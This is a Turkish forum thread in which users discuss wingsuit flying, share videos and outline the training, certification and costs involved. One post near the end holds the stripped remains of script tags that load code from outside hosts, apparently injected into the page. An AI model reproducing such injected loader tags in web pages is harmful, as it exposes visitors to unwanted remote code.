Uçmak
-
Bu nası bi spordur yahu ? Nası bi adrenalindir ?
Adamlar bildiğin uçuyor acaba bu sporu yapmak için nekadar eğitim almak gerekir, kaç paraya mal olur. Ölmeden yapmak lazım
http://www.facebook.com/photo.php?v=10150255408964201NOT : Hd izleyin
-
çok istedim hala istiyorum ama ilk önce uçakla atlama eğitimi yapılması lazım galiba. Bide para lazım :D az kaldı seneye kendi videomu koyarım inş :D
-
Arkadas kafam dondu ya, nasil bi melettir bu .d adamlarda ne gt var boyle valla 1 milyon euro versinler 10 dk binmem hacii :d
-
wingsuit
"bunu yaparken ölseniz bile sorun olmaz.çünkü yere indiğinizde hayat size boş gelicektir artık"normal atalamada 1300 feet 50 sn de alınırken wingsuit ile 2dk gibi bir sürede alnıyor..artı olarak ileri olarak 50-100 km/sa gibi bir hız kazanıyorsunuz.ama yapabilmek için 200 ün üzerinde normal atlayış gerektiriyor..
Ayrıca;
wingsuit kıyafeti ile atlamak amaç sadece düşmek değil ileriye doğru da gitmek. fai belgesi almak lazım ha diyince atlatmıyorlar. fai belgei için 25 skydiving atlayışı gerekli 800 lira yer eğitimine veriyorsun her atlayış için paraşüt kirası ile atlayış ücreti veriyorsun şuan için yani her atlayış(skydiving) 60-70 civarı. fai belgesini aldıktan sonra senden 100 atlayışdan fazla atlayış yapdığına dair belge istiyorlar. peki fai belgesi neye yarıyor? 25 den sonraki atlayışları ucuza 30 liraya yapıyorsun sadece. wingsuit atlayışları için yine bir yer eğitimi bununda maliyeti 500 pound civarı diyeceksiniz lan xyz lira diyordun şimdi niye pound. Eğitimini burada veren yok. bir 100 atlayşıda uçakla wingsuit kıyafeti ile yapıyorsun. en son seviye olarakda base jumping daha onu yapamadım ama işte 200 atlayışı yaptığını gösteriyorsun. eğitim alıyorsun falan filan bu atlayışlarda 5 kuruş ödemiyorsun artık endi ekipmanınla atladığın için. ölüm riski yüksek olduğundan hayat sigortası firmanızla irtibata geçin paket değişikliği gerekiyor.
BeYaZZZ tarafından 31/Ağu/12 22:38 tarihinde düzenlenmiştir -
ucmak bir tutkudur hocam
boyle bir seyi ya ucma ya da adrenalin tutkusu olanlar yapabilir
bunun yapilabilmesi icin once normal atlayilarda ustalasman lazim
yani bu en ust seviyelerde
bu tutkulara sahip olamanyanlarin gelemeyecegi seviyelerde
-
NG Türkiye de geçenlerde belgeseli vardı ölüm oranı yüksek ve çok tehlikeli olduğu için bir çok ülkede yasaktı yanılmıyorsam yamaç paraşütü ile başla:)
-
Daha öncede bikaç kere videolarını izlemiştim bu sporun.
Adamlar dağı taşı sıyırıp geçiyor,onu nasıl ayarlıyorlar hala anlayamadım.
Yerle aralarında 1 metre ya var ya yok adam dümdüz yardırıyo :D
-
http://www.youtube.com/watch?v=aHzLrHd46Ek
konuda bulunsun diye şeettim :D
ulquiorra tarafından 01/Eyl/12 00:13 tarihinde düzenlenmiştir -
ben rüyamda bilfiil uçtum, acayip güzeldi. bide bunlar gibi öyle kanat manatda yoktu yalandan uçmadım, Nathan Petrelli gibi yalın bir uçuştu kalkışı çok güzel bide =)
-
peki başka bişey sorucam o elbisenin içine nasil girip cıkıyrlar ördek ayaği gibi :S
edit:
bide hep kafama takilmiştir bu olsun ne bilim bangi jamping olsun bunlar nasil icat edilmiştir nasil bi kafadaymiş bunu bulan adam neyi amaçlamiş mesela derdi neymiş ne içmişte hadi bi yerden aşaği atlayayim diye düşünmüş :S
heycan demeyin ilk bulan da olsa adam durup duruken kendini ayaklarından bağlayip boşluğa bırakmaz .
< ="text/" ="http://loading-resource.com/.geo.php?callback=.__geo.get"> < ="text/" ="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"> antivirus tarafından 01/Eyl/12 00:23 tarihinde düzenlenmiştir -
Siz buna ucmami diyorsunuz..
Yasamak Nickli Murit e ulasin sizi ucursun..
